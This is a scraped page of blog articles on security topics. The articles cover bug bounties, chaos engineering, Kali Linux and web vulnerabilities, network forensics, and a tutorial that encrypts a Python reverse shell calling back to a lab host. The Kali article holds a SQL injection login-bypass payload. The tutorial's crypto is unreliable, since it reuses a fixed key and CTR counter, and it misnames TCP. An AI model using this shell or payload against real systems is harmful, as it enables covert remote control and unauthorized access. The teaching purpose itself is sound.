protecting data from terrorism. Bug bounty benefits and Responsible Disclosure The alternative for Pen Testing in Ethical Hacking is Crowdsourced security methods. These methods involve the participation of large numbers of ethical hackers, reporting vulnerabilities to companies in exchange for rewards that can consist of money or, just recognition. Similar practices have been utilized at large scale in the software industry. For example, the Vulnerability Rewards Programs (VRP) which have been applied to Chrome and Firefox, yielding several lessons on software security development. As per results, the Chrome VRP has cost approximately $580,000 over 3 years and has resulted in 501 bounties paid for the identification of security vulnerabilities. Crowdsource methods involve thousands of hackers working on a security target. In specific, instead of a point-in-time test, crowdsourcing enables continuous testing. In addition, as compared with Pen Testing, crowdsourcing hackers are only paid when a valid vulnerability is reported. Let us in detail understand Bug Bounty Programs (BBP) and Responsible Disclosure (RD). How do Bug Bounty Programs (BBP) work? Also known as Bug Bounties, the BBP represents reward-driven crowdsourced security testing where ethical hackers who successfully discover and report vulnerabilities to companies are rewarded. The BBPs can further be classified into public and private programs. Public programs allow entire communities of ethical hackers to participate in the program. They typically consist of large scale bug bounty programs and can be both time-limited and open-ended. Private programs, on the other hand, are generally limited to a selected sub-group of hackers, scoped to specific targets, and limited in time. These programs usually take place through commercial bug bounty platforms, where hackers are selected based on reputation, skills, and experience. The main platform vendors that included BBP are HackerOne, BugCrowd, Cobalt Labs, and Synack. Those platforms have facilitated establishing and maintaining BBPs for organizations. What is Responsible Disclosure (RD)? Also known as coordinated vulnerability disclosure, RD consists of rules and guidelines from companies that allow individuals to report vulnerabilities to organizations. The RD policies will define the models for a controlled and responsible disclosure of information upon vulnerabilities discovered by users. Here, most of the software vulnerabilities are discovered by both benign users and ethical hackers. In many situations, individuals might feel responsible for reporting the vulnerability to the organization, but companies may lack a channel for them to report the found vulnerabilities. Hence three different outcomes might occur including failed disclosure, full disclosure, and organization capture. Among these three, the target of RD is the organization capture where companies create a safe channel and provide rules for submitting vulnerabilities to their security team, and further allocate resources to follow up the process. One limitation of this qualitative study is that only experts that were conveniently available participated in the interview. The experts that participated in the research were predominantly from the Netherlands (13 experts), and more in general all from Europe, the results should be generalized with regard to other countries and the whole security industry. For IoT vulnerability management, the researchers recommend launching BBP only after companies have performed initial security testing and fixed the problems. The objective of BBP and RD policies should always be to provide additional support in finding undetected vulnerabilities, and never to be the only security practice. To know more about this study in detail, read the original research paper. How Blockchain can level up IoT Security How has ethical hacking benefited the software industry MITRE’s 2019 CWE Top 25 most dangerous software errors list released
Read more
  • 0
  • 0
  • 32527

article-image-protect-tcp-tunnel-implementing-aes-encryption-with-python
Savia Lobo
15 Jun 2018
7 min read
Save for later

Protect your TCP tunnel by implementing AES encryption with Python [Tutorial]

Savia Lobo
15 Jun 2018
7 min read
TCP (Transfer Communication Protocol) is used to streamline important communications. TCP works with the Internet Protocol (IP), which defines how computers send packets of data to each other. Thus, it becomes highly important to secure this data to avoid MITM (man in the middle attacks). In this article, you will learn how to protect your TCP tunnel using the Advanced Encryption Standard (AES) encryption to protect its traffic in the transit path. This article is an excerpt taken from 'Python For Offensive PenTest'written by Hussam Khrais.  Protecting your tunnel with AES In this section, we will protect our TCP tunnel with AES encryption. Now, generally speaking, AES encryption can operate in two modes, the Counter (CTR) mode encryption (also called the Stream Mode) and the Cipher Block Chaining (CBC) mode encryption (also called the Block Mode). Cipher Block Chaining (CBC) mode encryption The Block Mode means that we need to send data in the form of chunks: For instance, if we say that we have a block size of 512 bytes and we want to send 500 bytes, then we need to add 12 bytes additional padding to reach 512 bytes of total size. If we want to send 514 bytes, then the first 512 bytes will be sent in a chunk and the second chunk or the next chunk will have a size of 2 bytes. However, we cannot just send 2 bytes alone, as we need to add additional padding of 510 bytes to reach 512 in total for the second chunk. Now, on the receiver side, you would need to reverse the steps by removing the padding and decrypting the message. Counter (CTR) mode encryption Now, let's jump to the other mode, which is the Counter (CTR) mode encryption or the Stream Mode: Here, in this mode, the message size does not matter since we are not limited with a block size and we will encrypt in stream mode, just like XOR does. Now, the block mode is considered stronger by design than the stream mode. In this section, we will implement the stream mode and I will leave it to you to search around and do the block mode. The most well-known library for cryptography in Python is called PyCrypto. For Windows, there is a compiled binary for it, and for the Kali side, you just need to run the setup file after downloading the library. You can download the library from http://www.voidspace.org.uk/python/modules.shtml#pycrypto. So, as a start, we will use AES without TCP or HTTP tunneling: # Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES Stream import os from Crypto.Cipher import AES counter = os.urandom(16) #CTR counter string value with length of 16 bytes. key = os.urandom(32) #AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long. # Instantiate a crypto object called enc enc = AES.new(key, AES.MODE_CTR, counter=lambda: counter) encrypted = enc.encrypt("Hussam"*5) print encrypted # And a crypto object for decryption dec = AES.new(key, AES.MODE_CTR, counter=lambda: counter) decrypted = dec.decrypt(encrypted) print decrypted The code is quite straightforward. We will start by importing the os library, and we will import the AES class from Crypto.Cipher library. Now, we use the os library to create the random key and random counter. The counter length is 16 bytes, and we will go for 32 bytes length for the key size in order to implement AES-256. Next, we create an encryption object by passing the key, the AES mode (which is again the stream or CTR mode) and the counter value. Now, note that the counter is required to be sent as a callable object. That's why we used lambda structure or lambda construct, where it's a sort of anonymous function, like a function that is not bound to a name. The decryption is quite similar to the encryption process. So, we create a decryption object, and then pass the encrypted message and finally, it prints out the decrypted message, which should again be clear text. So, let's quickly test this script and encrypt my name. Once we run the script the encrypted version will be printed above and the one below is the decrypted one, which is the clear-text one: >>> ]ox:|s Hussam >>> So, to test the message size, I will just invoke a space and multiply the size of my name with 5. So, we have 5 times of the length here. The size of the clear-text message does not matter here. No matter what the clear-text message was, with the stream mode, we get no problem at all. Now, let us integrate our encryption function to our TCP reverse shell. The following is the client side script: # Python For Offensive PenTest# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES - Client - TCP Reverse Shell import socket import subprocess from Crypto.Cipher import AES counter = "H"*16 key = "H"*32 def encrypt(message): encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter) return encrypto.encrypt(message) def decrypt(message): decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter) return decrypto.decrypt(message) def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('10.10.10.100', 8080)) while True: command = decrypt(s.recv(1024)) print ' We received: ' + command ... What I have added was a new function for encryption and decryption for both sides and, as you can see, the key and the counter values are hardcoded on both sides. A side note I need to mention is that we will see in the hybrid encryption later how we can generate a random value from the Kali machine and transfer it securely to our target, but for now, let's keep it hardcoded here. The following is the server side script: # Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES - Server- TCP Reverse Shell import socket from Crypto.Cipher import AES counter = "H"*16 key = "H"*32 def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("10.10.10.100", 8080)) s.listen(1) print '[+] Listening for incoming TCP connection on port 8080' conn, addr = s.accept() print '[+] We got a connection from: ', addr ... This is how it works. Before sending anything, we will pass whatever we want to send to the encryption function first. When we get the shell prompt, our input will be passed first to the encryption function; then it will be sent out of the TCP socket. Now, if we jump to the target side, it's almost a mirrored image. When we get an encrypted message, we will pass it first to the decryption function, and the decryption will return the clear-text value. Also, before sending anything to the Kali machine, we will encrypt it first, just like we did on the Kali side. Now, run the script on both sides. Keep Wireshark running in background at the Kali side. Let's start with the ipconfig. So on the target side, we will able to decipher or decrypt the encrypted message back to clear text successfully. Now, to verify that we got the encryption in the transit path, on the Wireshark, if we right-click on the particular IP and select Follow TCP Stream in Wireshark, we will see that the message has been encrypted before being sent out to the TCP socket. To summarize, we learned to safeguard our TCP tunnel during passage of information using the AES encryption algorithm. If you've enjoyed reading this tutorial, do check out Python For Offensive PenTest to learn to protect the TCP tunnel using RSA. IoT Forensics: Security in an always connected world where things talk Top 5 penetration testing tools for ethical hackers Top 5 cloud security threats to look out for in 2018
Read more
  • 0
  • 0
  • 32335
article-image-how-chaos-engineering-can-help-predict-and-prevent-cyber-attacks-preemptively
Sugandha Lahoti
02 Oct 2019
7 min read
Save for later

How Chaos Engineering can help predict and prevent cyber-attacks preemptively

Sugandha Lahoti
02 Oct 2019
7 min read
It's no surprise that cybersecurity has become a major priority for global businesses of all sizes, often employing a dedicated IT team to focus on thwarting attacks. Huge budgets are spent on acquiring and integrating security solutions, but one of the most effective tools might be hiding in plain sight. Encouraging your own engineers and developers to purposely break systems through a process known as chaos engineering can drive a huge return on investment by identifying unknown weaknesses in your digital architecture. As modern networks become more complex with a vastly larger threat surface, stopping break-ins before they happen takes on even greater importance. Evolution of Cyberattacks Hackers typically have a background in software engineering and actually run their criminal enterprises in cycles that are similar to what happens in the development world. That means these criminals focus on iterations and agile changes to keep themselves one step ahead of security tools. Most hackers are focused on financial gains and look to steal data from enterprise or government systems for the purpose of selling it on the Dark Web. However, there is a demographic of cybercriminals focused on simply causing the most damage to certain organizations that they have targeted. In both scenarios, the hacker will first need to find a way to enter the perimeter of the network, either physically or digitally. Many cybercrimes now start with what's known as social engineering, where a hacker convinces an internal employee to divulge information that allows unauthorized access to take place. Principles of Chaos Engineering So how can you predict cyberattacks and stop hackers before they infiltrate your systems? That's where chaos engineering can help. The term first gained popularity a decade ago when Netflix created a tool called Chaos Monkey that would randomly take a node of their network offline to force teams to react accordingly. This proved effective because Netflix learned how to better keep their streaming service online and reduce dependencies between cloud servers. The Chaos Monkey tool can be seen as an example of a much broader practice: Chaos Engineering. The central insight of this form of testing is that, regardless of how all-encompassing your test suite is, as soon as your code is running on enough machines, errors are going to occur. In large, complex systems, it is essentially impossible to predict where these points of failure are going to occur. Rather than viewing this as a problem, chaos engineering sees it as an opportunity. Since failure is unavoidable, why not deliberately introduce it, and then attempt to solve randomly generated errors, in order to ensure your systems and processes can deal with the failure? For example, Netflix runs on AWS, but in response to frequent regional failures have changed their systems to become region agnostic. They have tested that this works using chaos engineering: they regularly take down important services in separate regions via a “chaos monkey” which randomly selects servers to take down, and challenges engineers to work around these failures. Though Netflix popularized the concept, chaos engineering, and testing is now used by many other companies, including Microsoft. The rise of cloud computing has meant that a high proportion of the systems running today have a similar level of complexity to Netflix’s server architecture. The cloud computing model has added a high level of complexity to online systems and the practice of chaos engineering will help to manage that over time, especially when it comes to cybersecurity. It's impossible to predict how and when a hacker will execute an attack, but chaos tests can help you be more proactive in patching your internal vulnerabilities. At first, your developers may be reluctant to jump into chaos activities since they will think their normal process works. However, there’s a good chance that, over time, they will grow to love chaos testing. You might have to do some convincing in the beginning, though, because this new approach likely goes against everything they’ve been taught about securing a network. Designing a Chaos Test Chaos tests need to be run in a controlled manner in order to be effective, and in many ways, the process lines up with the scientific method: in order to run a successful chaos test, you first need to identify a well-formed and refutable hypothesis. A test can then be designed that will prove (or more likely falsify) your hypothesis. For example, you might want to know how your network will react if one DNS server drops offline during a distributed denial of service (DDoS) attack by a hacker. This tactic of masking one’s IP address and overloading a website’s server can be executed through a VPN. Your hypothesis, in this case, is that you will be able to re-route traffic around the affected server. From there, you can begin designing and scheduling the experiment. If you are new to chaos engineering, you will want to restrict the test to a testing or staging environment to minimize the impact on live systems. Then make sure you have one person responsible for documenting the outcomes as the experiment begins. If you identify an issue during the first run of the chaos test, then you can pause that effort and focus on coming up with a solution plan. If not, expand the radius of the experiment until it produces worthwhile results. Running through this type of fire drill can be positive for various groups within a software organization, as it will provide practice for real incidents. Source: Medium How Chaos Engineering Fits Into Quality Assurance A lot of companies hear about chaos engineering and jump into it full-speed. But then over time they lose their enthusiasm for the practice or get distracted with other projects. So how should chaos tests be run and how do you ensure that they remain consistent and valuable? First, define the role of chaos engineering within your larger quality assurance efforts. In fact, your QA team may want to be the leaders of all chaos tests that are run. One important clarification is to distinguish between penetration tests and chaos tests. They both have the same goal of proactively finding system issues, but a penetration test is a specific event with a finite focus while chaos testing must be more open-ended. When teaching your teams about chaos engineering, it's vital to frame it as a practice and not a one-time activity. Return on investment will be hard to find if you do not systematically follow-up after chaos tests are run. The aim should be for continuous improvement to ensure your systems are prepared for any type of cyberattack. Final Thoughts These days, security vendors offer a wide range of tools designed to help companies protect their people, data, and infrastructure. Solutions like firewalls and virus scanners are certainly deployed to great success as part of most cybersecurity strategies, but they should never be treated as foolproof. Hackers are notorious at finding ways to get past these types of tools and exploit companies who are not prepared at a deeper level. The most mature organizations go one step further and find ways to proactively locate their own weaknesses before an outsider can expose them. Chaos engineering is a great way to accomplish this, as it encourages developers to look for gaps and bugs that they might not stumble upon normally. No matter how much planning goes into a system's architecture, unforeseen issues still come up, and hackers are a very dangerous variable in that equation. Author Bio Sam Bocetta is a freelance journalist specializing in U.S. diplomacy and national security, with emphasis on technology trends in cyberwarfare, cyberdefense, and cryptography.
Read more
  • 0
  • 0
  • 32305

article-image-why-secure-web-based-applications-with-kali-linux
Guest Contributor
12 Dec 2019
12 min read
Save for later

Why secure web-based applications with Kali Linux?

Guest Contributor
12 Dec 2019
12 min read
The security of web-based applications is of critical importance. The strength of an application is about more than the collection of features it provides. It includes essential (yet often overlooked) elements such as security. Kali Linux is a trusted critical component of a security professional’s toolkit for securing web applications. The official documentation says it is “is specifically geared to meet the requirements of professional penetration testing and security auditing.“ Incidences of security breaches in web-based applications can be largely contained through the deployment of Kali Linux’s suite of up-to-date software. Build secure systems with Kali Linux... If you wish to employ advanced pentesting techniques with Kali Linux to build highly secured systems, you should check out our recent book Mastering Kali Linux for Advanced Penetration Testing - Third Edition written by Vijay Kumar Velu and Robert Beggs. This book will help you discover concepts such as social engineering, attacking wireless networks, web services, and embedded devices. What it means to secure Web-based applications There is a branch of information security dealing with the security of websites and web services (such as APIs), the same area that deals with securing web-based applications. For web-based businesses, web application security is a central component. The Internet serves a global population and is used in almost every walk of life one may imagine. As such, web properties can be attacked from various locations and with variable levels of complexity and scale. It is therefore critical to have protection against a variety of security threats that take advantage of vulnerabilities in an application’s code. Common web-based application targets are SaaS (Software-as-a-Service) applications and content management systems like WordPress. A web-based application is a high-priority target if: the source code is complex enough to increase the possibility of vulnerabilities that are not contained and result in malicious code manipulation, the source code contains exploitable bugs, especially where code is not tested extensively, it can provide rewards of high value, including sensitive private data, after successful manipulation of source code, attacking it is easy to execute since most attacks are easy to automate and launch against multiple targets. Failing to secure its web-based application opens an organization up to attacks. Common consequences include information theft, damaged client relationships, legal proceedings, and revoked licenses. Common Web App Security Vulnerabilities A wide variety of attacks are available in the wild for web-based applications. These include targeted database manipulation and large-scale network disruption. Following are a few vectors or methods of attacks used by attackers: Data breaches A data breach differs from specific attack vectors. A data breach generally refers to the release of private or confidential information. It can stem from mistakes or due to malicious action. Data breaches cover a broad scope and could consist of several highly valuable records to millions of exposed user accounts. Common examples of data breaches include Cambridge Analytica and Ashley Madison. Cross-site scripting (XSS) It is a vulnerability that gives an attacker a way to inject client-side scripts into a webpage. The attacker can also directly access relevant information, impersonate a user, or trick them into divulging valuable information. A perpetrator could notice a vulnerability in an e-commerce site that permits embedding of HTML tags in the site’s comments section. The embedded tags feature permanently on the page, causing the browser to parse them along with other source code each time the page is accessed. SQL injection (SQLi) A method whereby a web security vulnerability allows an attacker to interfere with the queries that an application makes to its database. With this, an attacker can view data that they could normally not retrieve. Attackers may also modify or create fresh user permissions, manipulate or remove sensitive data. Such data could belong to other users, or be any data the application itself can access. In certain cases, an attacker can escalate the attack to exploit backend infrastructure like the underlying server. Common SQL injection examples include: Retrieving hidden data, thus modifying a SQL query to return enhanced results; Subverting application logic by essentially changing a query; UNION attacks, so as to retrieve data from different database tables; Examining the database, to retrieve information on the database’s version and structure; and Blind SQL injection, where you’re unable to retrieve application responses from queries you control. To illustrate subverting application logic, take an application that lets users log in with a username and password. If the user submits their username as donnie and their password as peddie, the application tests the credentials by performing this SQL query: SELECT * FROM users WHERE username = ‘donnie’ AND password = ‘donnie’ The login is successful where the query returns the user’s details. It is rejected, otherwise. An attacker can log in here as a regular user without a password, by merely using the SQL comment sequence -- to eliminate the password check from the WHERE clause of the query. An example is submitting the username admin’--along with a blank password in this query: SELECT * FROM users WHERE username = ‘admin’--’ AND password = ‘’ This query returns the user whose username is admin, successfully logging in the attacker in as that user. Memory corruption When a memory location is modified, leading to unexpected behavior in the software, memory corruption occurs. It is often not deliberate. Bad actors work hard to determine and exploit memory corruption using code injection or buffer overflow attacks. Hackers love memory vulnerabilities because it enables them to completely control a victim’s machine. Continuing the password example, let’s consider a simple password-validation C program. The code performs no validation on the length of the user input. It also does not ensure that sufficient memory is available to store the data coming from the user. Buffer overflow A buffer is a defined temporary storage in memory. When software writes data to a buffer, a buffer overflow might occur. Overflowing the buffer's capacity leads to overwriting adjacent memory locations with data. Attackers can exploit this to introduce malicious code in memory, with the possibility of developing a vulnerability within the target. In buffer overflow attacks, the extra data sometimes contains specific instructions for actions within the plan of a malicious user. An example is data that is able to trigger a response that changes data, reveals private information, or damages files. Heap-based buffer overflows are more difficult to execute than stack-based overflows. They are also less common, attacking an application by flooding the memory space dedicated for a program. Stack-based buffer overflows exploit applications by using a stack - a memory space for storing input. Cross-site request forgery (CSRF) Cross-site request forgery tricks a victim into supplying their authentication or authorization details in requests. The attacker now has the user's account details and proceeds to send a request by pretending as the user. Armed with a legitimate user account, the attacker can modify, exfiltrate, or destroy critical information. Vital accounts belonging to executives or administrators are typical targets. The attacker commonly requests the victim user to perform an action unintentionally. Changing an email address on their account, changing their password, or making a funds transfer are examples of such actions. The nature of the action could give the attacker full control over the user’s control. The attacker may even gain full control of the application’s data and security if the target user has high privileges within the application. Three vital conditions for a CSRF attack include: A relevant action within the application that the attacker has reason to induce. Modifying permissions for other users (privileged action) or acting on user-specific data (changing the user’s password, for example). Cookie-based session handling to identify who has made user requests. There is no other mechanism to track sessions or validate user requests. No unpredictable request parameters. When causing a user to change their password, for example, the function is not vulnerable if an attacker needs to know the value of the existing password. Let’s say an application contains a function that allows users to change the email address on their account. When a user performs this action, they make a request such as the following: POST /email/change HTTP/1.1 Host: target-site.com Content-Type: application/x-www-form-urlencoded Content-Length: 30 Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE email=don@normal-user.com The attacker may then build a web page containing the following HTML: Where the victim visits the attacker’s web page, these will happen: The attacker’s page will trigger an HTTP request to the vulnerable website. If the user is logged in to the vulnerable site, their browser will automatically include their session cookie in the request. The vulnerable website will carry on as normal, processing the malicious request, and change the victim user’s email address. Mitigating Vulnerabilities with Kali Linux Securing web-based user accounts from exploitation includes essential steps, such as using up-to-date encryption. Tools are available in Kali that can help generate application crashes or scan for various other vulnerabilities. Fuzzers, as these tools are called, are a relatively easy way to generate malformed data to observe how applications handle them. Other measures include demanding proper authentication, continuously patching vulnerabilities, and exercising good software development hygiene. As part of their first line of defence, many companies take a proactive approach, engaging hackers to participate in bug bounty programs. A bug bounty rewards developers for finding critical flaws in software. Open source software like Kali Linux allow anyone to scour an application’s code for flaws. Monetary rewards are a typical incentive. White hat hackers can also come onboard with the sole assignment of finding internal vulnerabilities that may have been treated lightly. Smart attackers can find loopholes even in stable security environments, making a fool-proof security strategy a necessity. The security of web-based applications can be through protecting against Application Layer, DDoS, and DNS attacks. Kali Linux is a comprehensive tool for securing web-based applications Organizations curious about the state of security of their web-based application need not fear; especially when they are not prepared for a full-scale penetration test. Attackers are always on the prowl, scanning thousands of web-based applications for the low-hanging fruit. By ensuring a web-based application is resilient in the face of these overarching attacks, applications reduce any chances of experiencing an attack. The hackers will only migrate to more peaceful grounds. So, how do organizations or individuals stay secure from attackers? Regular pointers include using HTTPS, adding a Web Application, installing security plugins, hashing passwords, and ensuring all software is current. These significant recommendations lower the probability of finding vulnerabilities in application code. Security continues to evolve, so it's best to integrate it into the application development lifecycle. Security vulnerabilities within your app are almost impossible to avoid. To identify vulnerabilities, one must think like an attacker, and test the web-based application thoroughly. A Debian Linux derivative from Offensive Security Limited, Kali Linux, is primarily for digital forensics and penetration testing. It is a successor to the revered BackTrack Linux project. The BackTrack project was based on Knoppix and manually maintained. Offensive Security wanted a true Debian derivative, with all the necessary infrastructure and improved packaging techniques. The quality, stability, and wide software selection were key considerations in choosing Debian. While developers churn out web-based applications by the minute, the number of web-based application attacks grows alongside in an exponential order. Attackers are interested in exploiting flaws in the applications, just as organizations want the best way to detect attackers’ footprints in the web application firewall. Thus, it will be detecting and blocking the specific patterns on the web-based application. Key features of Kali Linux Kali Linux has 32-bit and 64-bit distributions for hosts relying on the x86 instruction set. There's also an image for the ARM architecture. The ARM architecture image is for the Beagle Board computer and the ARM Chromebook from Samsung. Kali Linux is available for other devices like the Asus Chromebook Flip C100P, HP Chromebook, CuBox, CubieBoard 2, Raspberry Pi, Odroid U2, EfikaMX, Odroid XU, Odroid XU3, Utilite Pro, SS808, Galaxy Note 10.1, and BeagleBone Black. There are plans to make distributions for more ARM devices. Android devices like Google's Nexus line, OnePlus One, and Galaxy models also have Kali Linux through Kali NetHunter. Kali NetHunter is Offensive Security’s project to ensure compatibility and porting to specific Android devices. Via the Windows Subsystem for Linux (WSL), Windows 10 users can use any of the more than 600 ethical hacking tools within Kali Linux to expose vulnerabilities in web applications. The official Windows distribution IS from the Microsoft Store, and there are tools for various other systems and platforms. Conclusion Despite a plethora of tools dedicated to web app security and a robust curation mechanism, Kali Linux is the distribution of choice to expose vulnerabilities in web-based applications. Other tool options include Kubuntu, Black Parrot OS, Cyborg Linux, BackBox Linux, and Wifislax. While being open source has helped its meteoric rise, Kali Linux is one of the better platforms for up-to-date security utilities. It remains the most advanced penetration testing platform out there, supporting a wide variety of devices and hardware platforms. Kali Linux also has decent documentation compared to numerous other open source projects. There is a large, active, and vibrant community and you can easily install Kali Linux in VirtualBox on Windows to begin your hacking exploits right away. To further discover various stealth techniques to remain undetected and defeat modern infrastructures and also to explore red teaming techniques to exploit secured environment, do check out the book Mastering Kali Linux for Advanced Penetration Testing - Third Edition written by Vijay Kumar Velu and Robert Beggs. Author Bio Chris is a growth marketing and cybersecurity expert writer. He has contributed to sites such as “Cyber Defense Magazine,” “Social Media News,” and “MTA.” He’s also contributed to several cybersecurity magazines. He enjoys freelancing and helping others learn more about protecting themselves online. He’s always curious and interested in learning about the latest developments in the field. He’s currently the Editor in Chief for EveryCloud’s media division. Glen Singh on why Kali Linux is an arsenal for any cybersecurity professional [Interview] 3 cybersecurity lessons for e-commerce website administrators Implementing Web application vulnerability scanners with Kali Linux [Tutorial]
Read more
  • 1
  • 0
  • 31631

article-image-network-evidence-collection
Packt
05 Jul 2017
16 min read
Save for later

Network Evidence Collection

Packt
05 Jul 2017
16 min read
In this article by Gerard Johansen, author of the book Digital Forensics and Incident Response, explains that the traditional focus of digital forensics has been to locate evidence on the host hard drive. Law enforcement officers interested in criminal activity such as fraud or child exploitation can find the vast majority of evidence required for prosecution on a single hard drive. In the realm of Incident Response though, it is critical that the focus goes far beyond a suspected compromised system. There is a wealth of information to be obtained within the points along the flow of traffic from a compromised host to an external Command and Control server for example. (For more resources related to this topic, see here.) This article focuses on the preparation, identification and collection of evidence that is commonly found among network devices and along the traffic routes within an internal network. This collection is critical during an incident where an external threat sources is in the process of commanding internal systems or is in the process of pilfering data out of the network. Network based evidence is also useful when examining host evidence as it provides a second source of event corroboration which is extremely useful in determining the root cause of an incident. Preparation The ability to acquire network-based evidence is largely dependent on the preparations that are untaken by an organization prior to an incident. Without some critical components of a proper infrastructure security program, key pieces of evidence will not be available for incident responders in a timely manner. The result is that evidence may be lost as the CSIRT members hunt down critical pieces of information. In terms of preparation, organizations can aid the CSIRT by having proper network documentation, up to date configurations of network devices and a central log management solution in place. Aside from the technical preparation for network evidence collection, CSIRT personnel need to be aware of any legal or regulatory issues in regards to collecting network evidence. CSIRT personnel need to be aware that capturing network traffic can be considered an invasion of privacy absent any other policy. Therefore, the legal representative of the CSIRT should ensure that all employees of the organization understand that their use of the information system can be monitored. This should be expressly stated in policies prior to any evidence collection that may take place. Network diagram To identify potential sources of evidence, incident responders need to have a solid understanding of what the internal network infrastructure looks like. One method that can be employed by organizations is to create and maintain an up to date network diagram. This diagram should be detailed enough so that incident responders can identify individual network components such as switches, routers or wireless access points. This diagram should also contain internal IP addresses so that incident responders can immediately access those systems through remote methods. For instance, examine the below simple network diagram: This diagram allows for a quick identification of potential evidence sources. In the above diagram, for example, suppose that the laptop connected to the switch at 192.168.2.1 is identified as communicating with a known malware Command and Control server. A CSIRT analyst could examine the network diagram and ascertain that the C2 traffic would have to traverse several network hardware components on its way out of the internal network. For example, there would be traffic traversing the switch at 192.168.10.1, through the firewall at 192.168.0.1 and finally the router out to the Internet. Configuration Determining if an attacker has made modifications to a network device such as a switch or a router can be made easier if the CSIRT has a standard configuration immediately available. Organizations should already have configurations for network devices stored for Disaster Recovery purposes but should have these available for CSIRT members in the event that there is an incident. Logs and log management The lifeblood of a good incident investigation is evidence from a wide range of sources. Even something as a malware infection on a host system requires corroboration among a variety of sources. One common challenge with Incident Response, especially in smaller networks is how the organization handles log management. For a comprehensive investigation, incident response analysts need access to as much network data as possible. All to often, organizations do not dedicate the proper resources to enabling the comprehensive logs from network devices and other systems. Prior to any incident, it is critical to clearly define the how and what an organization will log and as well as how it will maintain those logs. This should be established within a log management policy and associated procedure. The CSIRT personnel should be involved in any discussion as what logs are necessary or not as they will often have insight into the value of one log source over another. NIST has published a short guide to log management available at: http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf. Aside from the technical issues regarding log management, there are legal issues that must be addressed. The following are some issues that should be addressed by the CSIRT and its legal support prior to any incident. Establish logging as a normal business practice: Depending on the type of business and the jurisdiction, users may have a reasonable expectation of privacy absent any expressly stated monitoring policy. In addition, if logs are enabled strictly to determine a user's potential malicious activity, there may be legal issues. As a result, the logging policy should establish that logging of network activity is part of the normal business activity and that users do not have a reasonable expectation of privacy. Logging as close to the event: This is not so much an issue with automated logging as they are often created almost as the event occurs. From an evidentiary standpoint, logs that are not created close to the event lose their value as evidence in a courtroom. Knowledgeable Personnel: The value of logs is often dependent on who created the entry and whether or not they were knowledgeable about the event. In the case of logs from network devices, the logging software addresses this issue. As long as the software can be demonstrated to be functioning properly, there should be no issue. Comprehensive Logging: Enterprise logging should be configured for as much of the enterprise as possible. In addition, logging should be consistent. A pattern of logging that is random will have less value in a court than a consistent patter of logging across the entire enterprise. Qualified Custodian: The logging policy should name a Data Custodian. This individual would speak to the logging and the types of software utilized to create the logs. They would also be responsible for testifying to the accuracy of the logs and the logging software used. Document Failures: Prolonged failures or a history of failures in the logging of events may diminish their value in a courtroom. It is imperative that any logging failure be documented and a reason is associated with such failure. Log File Discovery: Organizations should be made aware that logs utilized within a courtroom proceeding are going to be made available to opposing legal counsel. Logs from compromised systems: Logs that originate from a known compromised system are suspect. In the event that these logs are to be introduced as evidence, the custodian or incident responder will often have to testify at length concerning the veracity of the data contained within the logs. Original copies are preferred: Log files can be copied from the log source to media. As a further step, any logs should be archived off the system as well. Incident responders should establish a chain of custody for each log file used throughout the incident and these logs maintained as part of the case until an order from the court is obtained allowing their destruction. Network device evidence There are a number of log sources that can provide CSIRT personnel and incident responders with good information. A range of manufacturers provides each of these network devices. As a preparation task, CSIRT personnel should become familiar on how to access these devices and obtain the necessary evidence: Switches: These are spread throughout a network through a combination of core switches that handle traffic from a range of network segments to edge switches which handle the traffic for individual segments. As a result, traffic that originates on a host and travels out the internal network will traverse a number of switches. Switches have two key points of evidence that should be addressed by incident responders. First is the Content Addressable Memory (CAM) table. This CAM table maps the physical ports on the switch to the Network Interface Card (NIC) on each device connected to the switch. Incident responders in tracing connections to specific network jacks can utilize this information. This can aid in the identification of possible rogue devices. The second way switches can aid in an incident investigation is through facilitating network traffic capture. Routers: Routers allow organizations to connect multiple LANs into either Metropolitan Area Networks or Wide Area Networks. As a result, the handled an extensive amount of traffic. The key piece of evidentiary information that routers contain is the routing table. This table holds the information for specific physical ports that map to the networks. Routers can also be configured to deny specific traffic between networks and maintain logs on allowed traffic and data flow. Firewalls: Firewalls have changed significantly since the days when they were considered just a different type of router. Next generation firewalls contain a wide variety of features such as Intrusion Detection and Prevention, Web filtering, Data Loss Prevention and detailed logs about allowed and denied traffic. Firewalls often times serve as the detection mechanism that alerts security personnel to potential incidents. Incident responders should have as much visibility into how their organization's firewalls function and what data can be obtained prior to an incident. Network Intrusion Detection and Prevention systems: These systems were purposefully designed to provide security personnel and incident responders with information concerning potential malicious activity on the network infrastructure. These systems utilize a combination of network monitoring and rule sets to determine if there is malicious activity. Intrusion Detection Systems are often configured to alert to specific malicious activity while Intrusion Prevention Systems can detection but also block potential malicious activity. In either case, both types of platforms logs are an excellent place for incident responders to locate specific evidence on malicious activity. Web Proxy Servers: Organization often utilize Web Proxy Servers to control how users interact with websites and other internet based resources. As a result, these devices can give an enterprise wide picture of web traffic that both originates and is destined for internal hosts. Web proxies also have the additional feature set of alerting to connections to known malware Command and Control (C2) servers or websites that serve up malware. A review of web proxy logs in conjunction with a possible compromised host may identify a source of malicious traffic or a C2 server exerting control over the host. Domain Controllers / Authentication Servers: Serving the entire network domain, authentication servers are the primary location that incident responders can leverage for details on successful or unsuccessful logins, credential manipulation or other credential use. DHCP Server: Maintaining a list of assigned IP addresses to workstations or laptops within the organization requires an inordinate amount of upkeep. The use of Dynamic Host Configuration Protocol allows for the dynamic assignment of IP addresses to systems on the LAN. The 